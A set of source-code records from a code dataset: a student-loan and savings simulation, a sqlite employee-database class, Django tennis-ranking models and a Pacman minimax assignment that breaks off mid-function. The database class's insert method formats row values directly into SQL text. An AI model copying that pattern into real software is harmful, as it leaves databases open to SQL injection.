allocationForLOANS * simulationOutput.at[x, 'BiweeklyPay'] * 2\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = monthlyLoanPayment\n\n studentLoans = verifyOutstandingDebt(studentLoans, monthlyLoanPayment, dateOfPayment=1)\n\n if(studentLoans[0] is True):\n #If this condition is triggered, then we know that the debt has been FULLY SERVICED\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = 0.0\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = 0.0\n\n else:\n wherePaymentsLeftOff = studentLoans[2]\n\n simulationOutput.at[x, '%Contrib_CHECKING'] = round(allocationForCHECKING,3)\n simulationOutput.at[x, '$Contrib_CHECKING'] = round(allocationForCHECKING * simulationOutput.at[x, 'BiweeklyPay'] * 2,2)\n simulationOutput.at[x, '%Contrib_INVEST'] = round(allocationForINVESTMENTS,3)\n simulationOutput.at[x, '$Contrib_INVEST'] = round(allocationForINVESTMENTS * simulationOutput.at[x, 'BiweeklyPay'] * 2,2)\n savedThusFar = (12 * simulationOutput.at[x, '$Contrib_INVEST'])\n simulationOutput.at[x, 'SavedThusFar'] = savedThusFar\n simulationOutput.at[x, 'HoldingsAfterROI'] = savedThusFar*(1.035)\n\n allocationForCARPAYMENTS = (1 - allocationForCHECKING - allocationForLOANS - allocationForINVESTMENTS)\n simulationOutput.at[x, '%Contrib_CARPAY'] = round(allocationForCARPAYMENTS,3)\n simulationOutput.at[x, '$Contrib_CARPAY'] = round(allocationForCARPAYMENTS * simulationOutput.at[x, 'BiweeklyPay'] * 2,2)\n\n if (x > 0):\n earnedIncome = round(earnedIncome * (1 + annualRaiseRate / 100), 2)\n simulationOutput.at[x, 'DisposableIncome'] = round(earnedIncome * (1 - (taxRate / 100)), 2)\n simulationOutput.at[x, 'BiweeklyPay'] = round(simulationOutput.at[x, 'DisposableIncome'] / 26, 2)\n\n if(schoolLoansAreRepaidAsFixedProportionOfIncome is True):\n allocationForLOANS = simulationOutput.at[0, '%Contrib_SCHOOL_LOANS']\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = allocationForLOANS\n monthlyLoanPayment = round(allocationForLOANS * (2 * simulationOutput.at[x, 'BiweeklyPay']), 2)\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = monthlyLoanPayment\n\n if(studentLoans[0] is True):\n # If this condition is triggered, then we know that the debt has been FULLY SERVICED\n incrementFreed = simulationOutput.at[x-1, '%Contrib_SCHOOL_LOANS']\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = 0.00\n else:\n wherePaymentsLeftOff = studentLoans[2]\n studentLoans = verifyOutstandingDebt(studentLoans[1], monthlyLoanPayment, dateOfPayment=wherePaymentsLeftOff)\n incrementFreed = 0.00\n\n elif(schoolLoansAreRepaidAsFixedProportionOfIncome is False):\n monthlyLoanPayment = simulationOutput.at[0, '$Contrib_SCHOOL_LOANS']\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = monthlyLoanPayment\n allocationForLOANS = monthlyLoanPayment / (2 * simulationOutput.at[x, 'BiweeklyPay'])\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = round(allocationForLOANS,3)\n\n if(studentLoans[0] is True):\n #If this condition is triggered, then we know that the debt has been FULLY SERVICED\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = 0.00\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = 0.00\n else:\n wherePaymentsLeftOff = studentLoans[2]\n studentLoans = verifyOutstandingDebt(studentLoans[1], monthlyLoanPayment, dateOfPayment = wherePaymentsLeftOff)\n incrementFreed = simulationOutput.at[x - 1, '%Contrib_SCHOOL_LOANS'] \\\n - simulationOutput.at[x, '%Contrib_SCHOOL_LOANS']\n\n #df = studentLoans[1]\n #print(df['Payments'])\n\n allocationForINVESTMENTS = (incrementFreed * splitTowardINVESTING) + simulationOutput.at[x - 1, '%Contrib_INVEST']\n allocationForCHECKING = (incrementFreed * splitTowardCHECKING) + simulationOutput.at[x - 1, '%Contrib_CHECKING']\n\n simulationOutput.at[x, '%Contrib_INVEST'] = round(allocationForINVESTMENTS,3)\n simulationOutput.at[x, '$Contrib_INVEST'] = round(allocationForINVESTMENTS * (2 * simulationOutput.at[x, 'BiweeklyPay']),2)\n savedThusFar = (12 * simulationOutput.at[x, '$Contrib_INVEST']) + simulationOutput.at[x - 1, 'SavedThusFar']\n simulationOutput.at[x, 'SavedThusFar'] = savedThusFar\n\n simulationOutput.at[x, 'HoldingsAfterROI'] = savedThusFar*1.035\n\n simulationOutput.at[x, '%Contrib_CHECKING'] = round(allocationForCHECKING,3)\n simulationOutput.at[x, '$Contrib_CHECKING'] = round(allocationForCHECKING * (2 * simulationOutput.at[x, 'BiweeklyPay']),2)\n\n allocationForCARPAYMENTS = (1 - allocationForCHECKING - allocationForLOANS - allocationForINVESTMENTS)\n simulationOutput.at[x, '%Contrib_CARPAY'] = round(allocationForCARPAYMENTS,3)\n simulationOutput.at[x, '$Contrib_CARPAY'] = round(allocationForCARPAYMENTS * simulationOutput.at[x, 'BiweeklyPay'] * 2,2)\n\n simulationOutput.at[x, 'sumToOneCHECK'] = simulationOutput.at[x, '%Contrib_CHECKING'] + \\\n simulationOutput.at[x, '%Contrib_INVEST'] + \\\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] + \\\n simulationOutput.at[x, '%Contrib_CARPAY']\n\n\n #print(simulationOutput['$Contrib_INVEST'])\n print(simulationOutput['SavedThusFar'])\n\n # print(simulationOutput['%Contrib_CHECKING'],'\\n',simulationOutput['%Contrib_SCHOOL_LOANS'],'\\n',\n # simulationOutput['%Contrib_INVEST'],'\\n',simulationOutput['%Contrib_CARPAY'],'\\n')\n return simulationOutput, studentLoans[1]\n\n\nexpenses = calcLivingExpenses('listOfGoods.csv')\n#print(expenses)\n\n\n'''\nIf disposable income rises each year, and loan repayments are held constant, then the proportion of income that's\ndirected toward repayment will gradually become smaller as time goes on. The year-over-year difference in this fraction\nof income is called the INCREMENT-FREED. It represents the proportion of income that has become available for other uses\nEach year the INCREMENT-FREED is used to direct more income to both INVESTING & CHECKING. The split is defined by the\nFREED-INCOME SPLIT rules.\n'''\n\n#Simulation Settings\nscope = 12#years\nearnedIncome = 65000#dollars\nannualRaiseRate = 3.5#percent\ntermsOfDebt = (100000, 9.1, 15)\ncollegeDebt = defineLoanTerms(termsOfDebt[0], termsOfDebt[1], termsOfDebt[2])\nidealServicingDuration = 6#years\nsplitTowardCHECKING = 0.35\nsplitTowardINVESTING = 0.65\nincrementalIncomeFreedom = (splitTowardCHECKING, splitTowardINVESTING)\nallocationForCHECKING = 0.50\nallocationForDEBT_PMT = 0.4495 #0.3706\nallocationForINVESTING = 0.0505\ninitialAllocations = (allocationForCHECKING, allocationForDEBT_PMT, allocationForINVESTING)\n\ndebtDuration = termsOfDebt[2]\nmaxPaymentTowardDebt = (0.899 * allocationForCHECKING * (1-0.25) * (65000/26) * 2)\nreqPMT, idealPMT, capableTerm = calcRequiredMonthlyPayment(termsOfDebt[0], termsOfDebt[1], termsOfDebt[2],\n debtDuration, maxPaymentTowardDebt)\nprint(\"If the allocation for debt repayment is set to\",round(100 * 0.899 * allocationForCHECKING,2),\"% then the debt \"\n \"can be serviced within\",round(capableTerm,2),\"years.\")\n\n\nfixdREPMTresults, debtServicing1 = simulatePostGradLife(earnedIncome, annualRaiseRate, scope, collegeDebt, initialAllocations,\n incrementalIncomeFreedom, False)\npropREPMTresults, debtServicing2 = simulatePostGradLife(earnedIncome, annualRaiseRate, scope, collegeDebt, initialAllocations,\n incrementalIncomeFreedom, True)\n\n# for x in range(0, len(debtServicing1)):\n# print(debtServicing1.at[x, 'Month'], \" \", debtServicing1.at[x, 'BoP_Principal'], \" \",\n# debtServicing1.at[x, 'BoP_Balance'], \" \", debtServicing1.at[x, 'Payment'], \" \",\n# debtServicing1.at[x, 'EoP_AmtAppliedTowardInterest'], \" \", debtServicing1.at[x, 'EoP_AmtAppliedTowardPrincipal'], \" \",\n# debtServicing1.at[x, 'EoP_Balance'])\n# totalPaidInInterest = round(debtServicing1['EoP_AmtAppliedTowardInterest'].sum(),2)\n# print(\"You paid $\",totalPaidInInterest,\" in interest!\")\n\n# count = 1\n# for q in range(count,9):\n# nameOfPanel = 'ax'+str(count)\n# panelAssignment = nameOfPanel+'fig.add_subplot(42'+str(count)+')'\n# barChartAssignment = \"coordinatesForBarChart = \"+nameOfPanel+\".bar(fixdREPMTresults['Year'], fixdREPMTresults['DisposableIncome'])\"\n# eval(nameOfPanel+\".set_xlabel('Year')\")\n#\n# eval(nameOfPanel + \".set_title('Biweekly Pay')\")\n# eval(nameOfPanel + \".set_ylabel('Dollar Income')\")\n\n# fig = plt.figure()\n# fig.suptitle('Dashboard Controls', fontsize=20)\n#\n# ax1 = fig.add_subplot(421)\n# coordinatesForBarChart = ax1.bar(fixdREPMTresults['Year'], fixdREPMTresults['DisposableIncome'])\n# ax1.set_title('Biweekly Pay')\n# ax1.set_ylabel('Dollar Income')\n# ax1.set_xlabel('Year')\n# for i in ax1.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax1.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax2 = fig.add_subplot(422)\n# coordinatesForBarChart = ax2.bar(fixdREPMTresults['Year'], fixdREPMTresults['BiweeklyPay'])\n# ax2.set_title('Biweekly Pay')\n# ax2.set_ylabel('Dollar Income')\n# ax2.set_xlabel('Year')\n# for i in ax2.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax2.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax3 = fig.add_subplot(423)\n# coordinatesForBarChart = ax3.bar(fixdREPMTresults['Year'], fixdREPMTresults['$Contrib_INVEST'])\n# ax3.set_title('Funds for Investing (Fixed RePMT)')\n# ax3.set_ylabel('Monthly Allocation')\n# ax3.set_xlabel('Year')\n# for i in ax3.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax3.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax4 = fig.add_subplot(424)\n# coordinatesForBarChart = ax4.bar(propREPMTresults['Year'], propREPMTresults['$Contrib_INVEST'])\n# ax4.set_title('Funds for Investing (Proportional RePMT)')\n# ax4.set_ylabel('Monthly Allocation')\n# ax4.set_xlabel('Year')\n# for i in ax4.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax4.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax5 = fig.add_subplot(425)\n# coordinatesForBarChart = ax5.bar(fixdREPMTresults['Year'], fixdREPMTresults['SavedThusFar'])\n# ax5.set_title('Cumulative Savings (Fixed RePMT)')\n# ax5.set_ylabel('Value of Holdings')\n# ax5.set_xlabel('Year')\n# for i in ax5.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax5.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax6 = fig.add_subplot(426)\n# coordinatesForBarChart = ax6.bar(propREPMTresults['Year'], propREPMTresults['SavedThusFar'])\n# ax6.set_title('Cumulative Savings (Proportional RePMT)')\n# ax6.set_ylabel('Value of Holdings')\n# ax6.set_xlabel('Year')\n# for i in ax6.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax6.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax7 = fig.add_subplot(427)\n# coordinatesForBarChart = ax7.bar(fixdREPMTresults['Year'], fixdREPMTresults['$Contrib_CHECKING'])\n# ax7.set_title('Funds for Living Expenses (Fixed RePMT)')\n# ax7.set_ylabel('Monthly Allocation')\n# ax7.set_xlabel('Year')\n# for i in ax7.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax7.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax8 = fig.add_subplot(428)\n# coordinatesForBarChart = ax8.bar(propREPMTresults['Year'], propREPMTresults['$Contrib_CHECKING'])\n# ax8.set_title('Funds for Living Expenses (Proportional RePMT)')\n# ax8.set_ylabel('Monthly Allocation')\n# ax8.set_xlabel('Year')\n# for i in ax8.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax8.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=12, color='black')\n#\n# plt.show()\n\n\n\n\n# ax1 = fig.add_subplot(321)\n# x = output['Year']\n# y = output['$Contrib_INVEST']\n# ax1.plot(x,y)\n# ax1.set_ylim(output['$Contrib_INVEST'].min(),output['$Contrib_INVEST'].max()*1.05)\n# ax1.set_title('Dollar Contribution toward Investments')\n# ax1.set_ylabel('Monthly Allocation')\n# ax1.set_xlabel('Year')\n# for i,j in zip(x,y):\n# ax1.annotate(str(j), xy=(i,j))","sub_path":"personalFinances.py","file_name":"personalFinances.py","file_ext":"py","file_size_in_byte":25288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535557800","text":"import sqlite3\r\nfrom idata_access import IDataAccess\r\nfrom data import Data\r\n\r\n\r\nclass Database(IDataAccess):\r\n # Written By Vaishali\r\n # This is the MySQL Database connection class\r\n #\r\n #\r\n def __init__(self):\r\n # Written By Vaishali\r\n # The first method __init__() is a special method,\r\n # which is called class constructor or initialization method\r\n # creates to null veriable\r\n #\r\n self.conn = None\r\n self.cursor = None\r\n self.create_db_connection(\"staffinfo\")\r\n\r\n def create_db_connection(self, database_name):\r\n # Written by Vaishali\r\n #\r\n # This method to creates the connection with the database.\r\n #\r\n # Tries to handles the error if\r\n # no connection can be made. make the connection otherwise\r\n #\r\n # when database connect successfully then the conn atribute is given to\r\n # the connection object\r\n # and the cursor the cursor object.\r\n #\r\n # It then calls the make_tables method.\r\n #\r\n try:\r\n self.conn = sqlite3.connect(database_name)\r\n self.cursor = self.conn.cursor()\r\n self.make_tables() # call make_table method here\r\n except (ConnectionError, TypeError) as err: # If type error\r\n print(err) # Raised when an operation or function is attempted\r\n except Exception as e: # that is invalid for the specified data type.\r\n print(e)\r\n\r\n def make_tables(self):\r\n # Written By Vaishali\r\n #\r\n # This is called from the create_db_connection method.\r\n # Create the employee table within the database.\r\n #\r\n # This only happens if the table doesnt exist.\r\n #\r\n #\r\n # drop_table if exists\r\n\r\n make_table = \"\"\"CREATE TABLE IF NOT EXISTS EMPLOYEE ({0} VARCHAR(6),\r\n {1} CHAR, {2} INTERGER, {3} INTERGER, \r\n {4} VARCHAR(15), {5} INTERGER, {6} DATE);\"\"\"\r\n make_table = self.format_col(make_table)\r\n self.cursor.execute (make_table)\r\n self.conn.commit ()\r\n\r\n def format_col(self, sql):\r\n return sql.format(Data.EMPID.name,\r\n Data.GENDER.name,\r\n Data.AGE.name,\r\n Data.SALES.name,\r\n Data.BMI.name,\r\n Data.SALARY.name,\r\n Data.BIRTHDAY.name)\r\n\r\n def insert_employee_data(self, data_row):\r\n # Written By Vaishali\r\n #\r\n #\r\n #\r\n # employee_data = [(\"A001\",\"F\",\"23\",\"456\",\"Normal\",\"14\",\"30/05/1994\"),\r\n # (\"A221\",\"F\",\"49\",\"458\",\"Normal\",\"244\",\"30/05/1994\"),\r\n # (\"C342\",\"M\",\"50\",\"676\",\"Overweight\",\"300\",\"1/12/1977\"),\r\n # (\"D123\",\"F\",\"55\",\"123\",\"Obesity\",\"600\",\"15/01/1997\")]\r\n\r\n try:\r\n insert_string_1 = \"INSERT INTO employee ({0} ,{1}, {2}, {3}, {4}, {5}, {6}) \"\r\n insert_string_2 = self.format_col(insert_string_1)\r\n insert_string_2 += \"\"\"VALUES (\"{0}\", \"{1}\", \"{2}\", \"{3}\", \"{4}\",\r\n \"{5}\", \"{6}\");\"\"\"\r\n try:\r\n insert_command = insert_string_2.format(data_row[Data.EMPID.name],\r\n data_row[Data.GENDER.name],\r\n data_row[Data.AGE.name],\r\n data_row[Data.SALES.name],\r\n data_row[Data.BMI.name],\r\n data_row[Data.SALARY.name],\r\n data_row[Data.BIRTHDAY.name])\r\n self.cursor.execute(insert_command)\r\n self.conn.commit()\r\n except IndexError as err:\r\n print(err)\r\n return False\r\n\r\n except AttributeError as err:\r\n print(err)\r\n return False\r\n except UnboundLocalError as err:\r\n print(err)\r\n return False\r\n except TypeError as err:\r\n print(err)\r\n return False\r\n return True\r\n\r\n def save(self, data):\r\n for d in data:\r\n self.insert_employee_data(d)\r\n\r\n def read(self):\r\n # Written By Vaishali\r\n #\r\n # This function retrieve all the employee data from the employee table\r\n # in array format and leter in the another function\r\n # the data will be set to the specific format\r\n\r\n data_arr = [] # Retrieve employee data in to data_arr \"array\" format\r\n try:\r\n self.cursor.execute(\"Select * from employee\")\r\n data = self.cursor.fetchall()\r\n for r in data:\r\n data_arr.append({d.name : r[d.value] for d in Data})\r\n\r\n return data_arr\r\n except AttributeError as err:\r\n print(err)\r\n return False\r\n\r\n\r\n# db = Database()\r\n# new_data_01 = [{\"EMPID\": \"Y413\", \"GENDER\": \"M\", \"AGE\": 41, \"SALES\": 200,\r\n# \"BMI\": \"Obesity\", \"SALARY\": 450, \"BIRTHDAY\": \"01-09-1977\"}]\r\n# # print(db.save(new_data_01))\r\n# print(db.read())\r\n","sub_path":"src/database_conn.py","file_name":"database_conn.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"517810611","text":"# coding = utf-8\n# @Time : 2019/08/08\n# @Python : 3.6.1\n# 功能:逆向微信在线人数\n\n\ndef parse_wechat_online(list):\n res = []\n px = int(list[0]) / 1000\n py = int(list[1]) / 1000\n res.append([px, py])\n for i in range(2, len(list), 2):\n dx = int(list[i]) / 1000\n dy = int(list[i + 1]) / 1000\n x = px + dx\n y = py + dy\n res.append([round(x,2),round(y,2)])\n\n px = x\n py = y\n return res\n\nif __name__ == '__main__':\n list = [1,2,3,4,5,6,7,8,9,10]\n result = parse_wechat_online(list)\n print(result)","sub_path":"WeChat/tools/parse_wechat_online.py","file_name":"parse_wechat_online.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536486880","text":"import re\n\nfrom django.db import models\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom locations.models import City\nfrom accounts.models import PlayerProfile\n\n\n\n\nclass Result (models.Model):\n \"\"\"\n Represents the result of a tennis match. There are three\n types of them, and the scores are kept in a comma-separated\n CharField, with a colon between the number of games for each\n player (winner is always first), e.g.:\n \n type=1\n score=\"10:8\"\n \n type=3\n score=\"6:3,4:6,6:1\"\n \n type=5\n score=\"6:1,6:2,6:4\"\n \n \"\"\"\n GAMES_DELIMITER=':'\n SETS_DELIMITER='[\\s,.-]'\n TYPES=((1, _('One set')),\n (3, _('Best of three sets')),\n (5, _('Best of five sets')))\n type = models.PositiveSmallIntegerField (choices=TYPES,\n default=1)\n score = models.CharField (max_length=30)\n \n def get_sets (self):\n \"\"\"\n Returns a list of results per set, e.g.\n \n '6:3,7:6'\n get_sets ( ) -> ['6:3','7:6']\n \"\"\"\n return re.split ('%s*' % Result.SETS_DELIMITER,\n self.score)\n \n def __unicode__ (self):\n return self.score\n \n\nclass SingleMatchManager (models.Manager):\n def get_winner_results (self, player):\n \"\"\"\n Returns a QuerySet with all the matches the player won\n and their results.-\n \"\"\"\n ret_value = SingleMatch.objects.filter (is_challenged=False) \\\n .filter (winner=player)\n return ret_value\n \n def get_loser_results (self, player):\n \"\"\"\n Returns a QuerySet with all the matches the user lost\n and their results.-\n \"\"\"\n ret_value = SingleMatch.objects.filter (is_challenged=False) \\\n .filter (loser=player)\n return ret_value\n \n def get_results (self, user):\n \"\"\"\n Returns a QuerySet with all the matches and their results\n for the user 'user'.-\n \"\"\"\n if PlayerProfile.objects.filter (user=user):\n player = PlayerProfile.objects.get (user=user)\n ret_value = SingleMatch.objects.get_winner_results (player)\n ret_value |= SingleMatch.objects.get_loser_results (player)\n else:\n ret_value = SingleMatch.objects.none ( )\n return ret_value\n\n\n\nclass SingleMatch (models.Model):\n \"\"\"\n Represents a match between two players.-\n \"\"\"\n winner = models.ForeignKey (PlayerProfile,\n related_name='winner')\n loser = models.ForeignKey (PlayerProfile,\n related_name='loser')\n result = models.ForeignKey (Result,\n unique=True)\n date = models.DateField (null=True,\n blank=True)\n city = models.ForeignKey (City,\n null=True,\n blank=True)\n is_challenged = models.BooleanField (default=False)\n objects = SingleMatchManager ( )\n \n def __unicode__ (self):\n return '%s %s %s %s' % (self.winner.user.username,\n _('won'),\n self.loser.user.username,\n self.result)\n\n\n\nclass Ranking (models.Model):\n \"\"\"\n Represents the players' ranking.-\n \"\"\"\n player = models.ForeignKey (PlayerProfile,\n unique=True)\n points = models.PositiveIntegerField (default = 0)\n \n def __unicode__ (self):\n return \"%s %s\" % (self.player.user_profile.user.username,\n self.points)\n\n\n\n@receiver(post_save, sender=SingleMatch)\ndef calculate_ranking (sender, instance, created, **kwargs):\n \"\"\"\n Callback function called whenever a new match result is created.\n It (re)calculates the points earned by each player who has entered\n any match results.-\n \"\"\"\n #\n # Make sure a new match results has been inserted\n #\n if (created):\n #\n # recalculate points for theses players\n #\n players = [instance.winner,\n instance.loser]\n for p in players:\n points = 0\n matches = SingleMatch.objects.get_winner_results (p)\n \n for m in matches:\n for s in m.result.get_sets ( ):\n points += int (re.split (Result.GAMES_DELIMITER, s)[0])\n #\n # recalculate points for the matches lost\n #\n matches = SingleMatch.objects.get_loser_results (p)\n \n for m in matches:\n for s in m.result.get_sets ( ):\n points += int (re.split (Result.GAMES_DELIMITER, s)[1])\n #\n # Try to find a ranking entry for this player\n #\n r = Ranking.objects.filter (player=p)\n if not r:\n r = Ranking ( )\n r.player = p\n else:\n r = r[0]\n r.points = points\n r.save ( )\n ","sub_path":"ranking/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9752779","text":"# multiAgents.py\n# --------------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\nfrom util import manhattanDistance, PriorityQueue\nfrom game import Directions\nimport random, util\n\nfrom game import Agent\nfrom searchAgents import mazeDistance\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nclass ReflexAgent(Agent):\n \"\"\"\n A reflex agent chooses an action at each choice point by examining\n its alternatives via a state evaluation function.\n\n The code below is provided as a guide. You are welcome to change\n it in any way you see fit, so long as you don't touch our method\n headers.\n \"\"\"\n\n\n def getAction(self, gameState):\n \"\"\"\n You do not need to change this method, but you're welcome to.\n\n getAction chooses among the best options according to the evaluation function.\n\n Just like in the previous project, getAction takes a GameState and returns\n some Directions.X for some X in the set {NORTH, SOUTH, WEST, EAST, STOP}\n \"\"\"\n # Collect legal moves and successor states\n legalMoves = gameState.getLegalActions()\n\n # Choose one of the best actions\n # print('+++++++++++++++++++++++++++++++++')\n # print('current pos ', gameState.getPacmanPosition(), 'ghost positions ', gameState.getGhostPositions())\n scores = [self.evaluationFunction(gameState, action) for action in legalMoves]\n bestScore = max(scores)\n bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n chosenIndex = random.choice(bestIndices) # Pick randomly among the best\n\n \"Add more of your code here if you want to\"\n # print(bcolors.OKBLUE, ' chosen move ', legalMoves[chosenIndex], 'best scores ', bestScore, bcolors.ENDC)\n # print('+++++++++++++++++++++++++++++++++')\n\n return legalMoves[chosenIndex]\n\n def evaluationFunction(self, currentGameState, action):\n \"\"\"\n Design a better evaluation function here.\n\n The evaluation function takes in the current and proposed successor\n GameStates (pacman.py) and returns a number, where higher numbers are better.\n\n The code below extracts some useful information from the state, like the\n remaining food (newFood) and Pacman position after moving (newPos).\n newScaredTimes holds the number of moves that each ghost will remain\n scared because of Pacman having eaten a power pellet.\n\n Print out these variables to see what you're getting, then combine them\n to create a masterful evaluation function.\n \"\"\"\n # Useful information you can extract from a GameState (pacman.py)\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n newPos = successorGameState.getPacmanPosition()\n newFood = successorGameState.getFood()\n newGhostStates = successorGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n newGhostPositions = successorGameState.getGhostPositions()\n score = 0 # 100*len(newGhostStates)\n for pos in newGhostPositions:\n distFromGhost = manhattan_dist(newPos, pos)\n distFromGhost +=0.01 # avoid 0 division\n # print('distFromGhost ', distFromGhost)\n if distFromGhost <=4:\n score -= 200/distFromGhost\n # break\n pq = PriorityQueue()\n for foodPos in newFood.asList():\n dist = manhattan_dist(newPos, foodPos)\n # print(bcolors.WARNING,' distFromFood ', dist, ' at', foodPos, bcolors.ENDC)\n dist += 0.01\n pq.push(dist, dist)\n\n # if dist<=4:\n # print(bcolors.WARNING,' distFromFood ', dist, bcolors.ENDC)\n # score += 100/dist\n\n while pq.isEmpty() is False:\n dist = pq.pop()\n # print(bcolors.WARNING, ' distFromFood ', dist, bcolors.ENDC)\n score += 100/dist\n\n # score += 500/(newFood.count()+0.1)\n if currentGameState.getFood().count()>successorGameState.getFood().count():\n # print(bcolors.BOLD, 'Will get food', bcolors.ENDC)\n score += 200\n\n \"*** YOUR CODE HERE ***\"\n # print(action, newPos, newFood.count(), newGhostPositions, newScaredTimes, ' score ', score)\n return score # successorGameState.getScore()\n\ndef manhattan_dist(p,q):\n return abs(p[0]-q[0]) + abs(p[1]-q[1])\n\ndef scoreEvaluationFunction(currentGameState):\n \"\"\"\n This default evaluation function just returns the score of the state.\n The score is the same one displayed in the Pacman GUI.\n\n This evaluation function is meant for use with adversarial search agents\n (not reflex agents).\n \"\"\"\n return currentGameState.getScore()\n\nclass MultiAgentSearchAgent(Agent):\n \"\"\"\n This class provides some common elements to all of your\n multi-agent searchers. Any methods defined here will be available\n to the MinimaxPacmanAgent, AlphaBetaPacmanAgent & ExpectimaxPacmanAgent.\n\n You *do not* need to make any changes here, but you can if you want to\n add functionality to all your adversarial search agents. Please do not\n remove anything, however.\n\n Note: this is an abstract class: one that should not be instantiated. It's\n only partially specified, and designed to be extended. Agent (game.py)\n is another abstract class.\n \"\"\"\n\n def __init__(self, evalFn = 'scoreEvaluationFunction', depth = '2'):\n self.index = 0 # Pacman is always agent index 0\n self.evaluationFunction = util.lookup(evalFn, globals())\n self.depth = int(depth)\n\nclass MinimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent (question 2)\n \"\"\"\n # def minAgent(self, gameState, agentIndex, depth):\n # if depth>self.depth:\n # if\n # v = float('inf')\n # legalMoves = gameState.getLegalActions(agentIndex)\n # nextMove = 'Stop'\n # for move in legalMoves:\n # nextState = gameState.generateSuccessor(agentIndex, move)\n # # v = min(v, self.evaluationFunction(nextState))\n # newValue = self.evaluationFunction(nextState)\n # if newValue= 1\n\n gameState.generateSuccessor(agentIndex, action):\n Returns the successor game state after an agent takes an action\n\n gameState.getNumAgents():\n Returns the total number of agents in the game\n\n gameState.isWin():\n Returns whether or not the game state is a winning state\n\n gameState.isLose():\n Returns whether or not the game state is a losing state\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # legalMoves = gameState.getLegalActions()\n # for agentIndex in gameState.getnumAgents():\n # scores = [self.evaluationFunction(gameState.generateSuccessor(agentIndex, action)) for action in legalMoves]\n # bestScore = max(scores)\n # bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n # chosenIndex = random.choice(bestIndices)\n depth = 0\n agent = 0\n score, move = self.minimaxSearch(gameState, depth, agent)\n\n return move\n # util.raiseNotDefined()\n\n def minimaxSearch(self, state, depth, agent):\n # returns [score, move]\n if depth is self.depth or state.isWin() or state.isLose():\n # print(depth, self.depth)\n return [self.evaluationFunction(state), None]\n\n # if agent%state.getNumAgents() is 0:\n # # agentType = 'MAX'\n # # else:\n # # agentType = 'MIN'\n agent = agent%state.getNumAgents()\n\n if agent is 0: # pacman\n # '''max agent'''\n # maxAgent(state, depth)\n v = [-float(\"inf\"), None]\n # legalMoves = gameState.getLegalActions(0)\n # for move in legalMoves:\n # nextState = gameState.generateSuccessor(0, move)\n # score, move = self.minimaxSearch(state=nextState, depth=depth, agent='MIN')\n # if score>v[0]:\n # v = [score, move]\n else:\n # '''min agent'''\n v = [float(\"inf\"), None]\n # minAgent(state, depth)\n # for agent in range(gameState.getNumAgents()):\n legalMoves = state.getLegalActions(agent)\n # print('agent ', agent, 'legalMoves ', legalMoves)\n if agent==state.getNumAgents()-1:\n depth+=1\n for move in legalMoves:\n nextState = state.generateSuccessor(agent, move)\n score, moveReturned = self.minimaxSearch(state=nextState, depth=depth, agent=agent+1)\n if agent is 0:\n if score>v[0]:\n v = [score, move]\n else:\n if scorev[0]:\n # v = [score, 